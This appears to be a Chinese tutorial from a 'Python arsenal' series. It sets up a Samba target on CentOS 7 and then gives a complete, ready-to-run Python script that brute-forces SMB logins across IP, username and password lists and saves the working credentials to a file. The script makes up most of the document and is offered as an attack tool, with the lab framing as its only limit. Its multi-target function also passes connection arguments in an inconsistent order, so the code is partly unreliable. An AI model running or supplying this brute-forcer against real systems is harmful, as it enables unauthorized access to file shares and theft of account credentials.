Python武器库开发-武器库篇之SMB服务暴力破解(五十五)
SMB服务(Server Message Block)是一种用于文件共享、打印机共享和其他资源共享的网络协议。它最初由IBM开发,后来被微软广泛采用。
SMB服务允许多台计算机在网络上共享文件和资源,从而实现文件的读取、写入和共享。通过SMB服务,用户可以访问其他计算机上的文件、打印机、文件夹和其他共享资源,就像访问本地资源一样。
SMB服务还提供了许多功能和特性,如权限控制、文件锁定、文件和目录的远程操作等。它通过TCP/IP协议在网络上进行通信,并使用NetBIOS或者TCP/IP的名称解析来定位和识别其他计算机上的共享资源。
SMB服务在Windows操作系统中得到广泛应用,并且被很多网络存储设备、打印机和其他网络设备所支持。它是实现文件共享和资源共享的重要协议之一,在企业和家庭网络中都有广泛的应用。
环境准备
首先,我们需要准备一台Centos7机器作为靶机在CentOS 7上配置SMB服务的步骤如下:
- 确保CentOS 7已安装samba软件包,如果未安装,请使用以下命令进行安装:
sudo yum install samba
- 使用文本编辑器打开SMB配置文件/etc/samba/smb.conf:
sudo vi /etc/samba/smb.conf
在配置文件中找到合适的全局配置部分(通常是以[global]开头),在其中添加以下内容:
[global]
security = user
这会将SMB服务器的安全模式设置为用户模式。
- 在文件的末尾添加以下内容,定义要共享的文件夹和访问权限:
[share]
path = /path/to/shared/folder
valid users = username
read only = no
在上述示例中,将/path/to/shared/folder替换为您要共享的实际文件夹路径,并将username替换为允许访问此共享的用户名,然后保存并关闭配置文件。
- 配置SMB用户,使用以下命令创建SMB用户,并设置密码:
sudo smbpasswd -a username
您可以将username替换为将用于访问共享的实际用户名,随后您将被提示输入新密码。
将新用户添加到sudo组,使其具有管理员权限,输入以下命令:
sudo usermod -aG wheel username
其中,"username"是你刚刚创建的新用户的名称。
- 启动和启用SMB服务,使用以下命令启动SMB服务,并将其设置为在系统启动时自动启用:
sudo systemctl start smb
sudo systemctl enable smb
- 在防火墙上配置SMB服务。如果防火墙启用了,您需要允许SMB服务的通信。使用以下命令添加防火墙规则:
sudo firewall-cmd --permanent --add-service=samba
sudo firewall-cmd --reload
完成后,您可以使用Windows或其他支持SMB协议的设备访问CentOS 7上的共享文件夹,这样,您就在CentOS 7上成功配置了SMB服务。
破解代码
下来我们用python写一段暴力破解SMB服务的代码,代码内容如下:
import os
from smb.SMBConnection import SMBConnection
############################ Clear Consle While Start a Loop ##############################
def clear():
os.system('cls') # on Windows System
############################ Collect Single Credential From User Input ##############################
def CollectCredential():
remote_ip = input('Enter Host IP:')
username = input('Enter SMB Username:')
password = input('Enter SMB Password:')
domain = input('Enter Domain Name:')
return (remote_ip, username, password, domain)
############################ Verify the Input File Direction ##############################
# If the direction cannot be found, set the input as an atribute.
def VerifyFile(up):
ver = []
try:
file = open(up, 'r')
data = file.readlines()
print('File Direction Verified.')
for line in data:
ver.append(line.strip())
except:
ver.append(up)
return ver
return ver
############################ Collect File Directions From User Input ##############################
# Support IP, username, password SMB brute force attack,
# user can input single attributes replace one to three attributes with files
def CollectFiles():
remote_ip = input('Enter Host IP or File Direction:')
remote_ip = VerifyFile(remote_ip)
username = input('Enter SMB Username or File Direction:')
username = VerifyFile(username)
password = input('Enter SMB Password or File Direction:')
password = VerifyFile(password)
domain = input('Enter Domain Name:')
return (remote_ip, username, password, domain)
############################ Generate Collected Credentials in to Files ##############################
def GenerateCredentials():
try:
with open("Credential.txt", mode='w', encoding='utf-8') as ff:
for i in range(len(credential)):
ff.write(credential[i] + ' ')
if (i + 1) % 4 == 0:
ff.write('\n')
except FileNotFoundError:
with open("Credential.txt", mode='w', encoding='utf-8') as ff:
for i in range(len(credential)):
ff.write(credential[i] + ' ')
if (i + 1) % 4 == 0:
ff.write('\n')
############################ SMB Functions Using SMBConnection ##############################
class SMB(object):
def __init__(self, remote_ip, username, password, domain):
self.remote_ip = remote_ip
self.username = username
self.password = password
self.domain = domain
############################ Use the Single Credential CollectCredential() to Login ##############################
def SingleLoginScanner(self):
my_name = ""
remote_name = ""
try:
self.conn = SMBConnection(self.username, self.password, my_name, remote_name, self.domain, use_ntlm_v2=True,
sign_options=2, is_direct_tcp=True)
connected = self.conn.connect(self.remote_ip, 445)
if connected == True:
print('Success :) %s USERNAME:%s PASSWORD:%s DOMAIN:%s' % (
self.remote_ip, self.username, self.password, self.domain))
credential.append(self.remote_ip)
credential.append(self.username)
credential.append(self.password)
credential.append(self.domain)
print("Credential", credential)
else:
print('False :( %s USERNAME:%s PASSWORD:%s DOMAIN:%s' % (
self.remote_ip, self.username, self.password, self.domain))
self.conn.close()
except Exception as e:
print(e)
############################ Use the Multiple Credentials CollectFiles() to Login ##############################
def MultiLoginScanner(self):
count = 0
my_name = ""
remote_name = ""
for ip in self.remote_ip:
for username in self.username:
for password in self.password:
count += 1
try:
self.conn = SMBConnection(username, password, self.domain, my_name, remote_name,
use_ntlm_v2=True, sign_options=2, is_direct_tcp=True)
connected = self.conn.connect(ip, 445)
if connected == True:
print('%d Success :) %s USERNAME:%s PASSWORD:%s DOMAIN:%s' % (
count, ip, username, password, self.domain))
credential.append(ip)
credential.append(username)
credential.append(password)
credential.append(self.domain)
print("Credential", credential)
else:
print('%d False :( %s USERNAME:%s PASSWORD:%s DOMAIN:%s' % (
count, ip, username, password, self.domain))
self.conn.close()
except Exception as e:
print('%d False :( %s USERNAME:%s PASSWORD:%s DOMAIN:%s' % (
count, ip, username, password, self.domain))
print(e)
############################ SMB Functions Support User to Chose ##############################
def main():
while (1):
print('********************SMB PYTHON TOOKIT********************')
print('1. Single credential SMB Login Scanner')
print('2. Credentials list from file SMB Brute Force')
print('3. Generate Collected Credentials')
print('4. Quit')
print('*********************************************************\n')
chose = input('Type number to pick function:')
if chose == '1':
print('Only support to input single ip address, username and password.\n')
remote_ip, username, password, domain = CollectCredential()
smb = SMB(remote_ip, username, password, domain)
smb.SingleLoginScanner()
elif chose == '2':
print(
'Support Local File Directories contain ip/username/password or they will be recognized as a string.\n')
remote_ip, username, password, domain = CollectFiles()
smb = SMB(remote_ip, username, password, domain)
smb.MultiLoginScanner()
elif chose == '3':
print('Generating Successful Credentials in a txt file...\n')
GenerateCredentials()
print('Generated Credential.txt in the same python Directory.\n')
else:
print('Please input valid number!\n')
clear()
if __name__ == '__main__':
credential = []
main()
这段代码是一个SMB(Server Message Block)登录工具的Python脚本,用于验证SMB登录的凭据。
首先,脚本导入了os和SMBConnection模块。
然后定义了一个clear函数,用于在启动循环时清除控制台。
接下来是CollectCredential函数,用于从用户输入中收集单个凭据,包括远程主机IP、SMB用户名、SMB密码和域名。
VerifyFile函数用于验证输入文件路径是否正确。如果路径找不到,它会将输入文件路径设置为一个属性。
CollectFiles函数用于从用户输入中收集文件路径。支持输入单个属性,用文件替换一个到三个属性。
GenerateCredentials函数用于将收集到的凭据生成为文本文件。
SMB类是一个SMB的封装类,包含了SMB登录的各种功能。
SingleLoginScanner函数用于使用单个凭据登录。
MultiLoginScanner函数用于使用多个凭据登录。
main函数是脚本的主函数,用于选择SMB登录功能。根据用户的选择,调用相应的函数。
最后,在脚本的主模块中定义了一个空的credential列表,用于存储登录成功的凭据。
当脚本作为独立的程序运行时,会调用main函数开始执行。
运行实验
接下来我们在实际运行这段代码试验一下,如图程序首先会要求我们选择一个破解的选项,我们这里选择 1 ,(单凭据破解):
随后程序会要求我们输入要破解的SMB服务的主机IP地址、登录用户名和破解密码,这里我们输入,域名如果没有的话我们可以选择不输入:
最后,如图我们成功登录了SMB服务:
